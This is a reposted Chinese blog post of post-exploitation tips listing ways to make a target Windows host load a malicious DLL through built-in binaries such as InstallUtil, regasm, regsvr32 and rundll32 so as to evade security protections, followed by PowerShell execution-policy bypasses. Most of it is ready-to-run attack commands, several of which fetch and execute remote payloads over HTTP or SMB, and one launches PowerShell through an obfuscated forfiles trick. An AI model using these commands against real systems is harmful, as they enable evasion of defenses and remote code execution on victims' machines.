[總結]加載 DLL 的多種方式

本文轉載自查看原文 2020-04-09 22:21 803 小技巧/ 總結/ 后滲透

在滲透測試過程中，意圖使目標主機執行惡意 DLL ，達到一定的目的。但在這個過程中總是會遇到各種各種的安全防護，下面通過系統自帶的程序來繞過安全防護，加載我們自己想要執行的 DLL 文件：

#InstallUtil.exe
#x86
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
#x64
C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

#regsvcs.exe
#x86
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
#x64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll

#regasm.exe
#x86
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
#x64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll

#regsvr32
#x86
regsvr32 /s /u AllTheThings.dll
#x64
regsvr32 /s AllTheThings.dll

#加載遠程腳本執行
regsvr32 /s /u /i:http://ip.xyz/file.sct scrobj.dll
regsvr32 /u /n /s /i:\\192.168.164.1\folder\payload.sct scrobj.dll

#rundll32
rundll32 AllTheThings.dll,EntryPoint
rundll32 javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://ip/payload.sct");window.close();
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

順便再補充一下繞過 PowerShell 執行策略的命令：

#本地文件執行
powershell.exe -ExecutionPolicy bypass -File Payload.ps1
powershell.exe exec bypass -Command "& {Import-Module C:\Payload.ps1;Invoke-AllChecks}"

#遠程無文件執行
powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString("http://192.168.1.1/Payload.ps1");[payload的參數]  (去除方括號)

#如果本地的 powershell 命令參數進行了限制，還可以嘗試使用 ps_encoder.py 腳本將編碼轉為 base64 格式

forfiles /p %COMSPEC:~0,19% /s /c "@file -noe" /m po*l.*e

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 多種shiro利用方式總結 Spring多種加載Bean方式簡析 android多種方式實現異步加載圖片 [總結]多種方式探測內網存活主機日志管理系統，多種方式總結 Hibernate中多種方式解除延遲加載 Spring學習總結（一）——Spring實現IoC的多種方式 ASP.NET MVC傳遞Model到視圖的多種方式總結（一）__通用方式的使用【Android筆記】listview加載性能優化及有多種listitem布局處理方式 VC下加載多種格式圖片的方法總結IPicture, CxImage, CImage(AtlImage), CPictureEx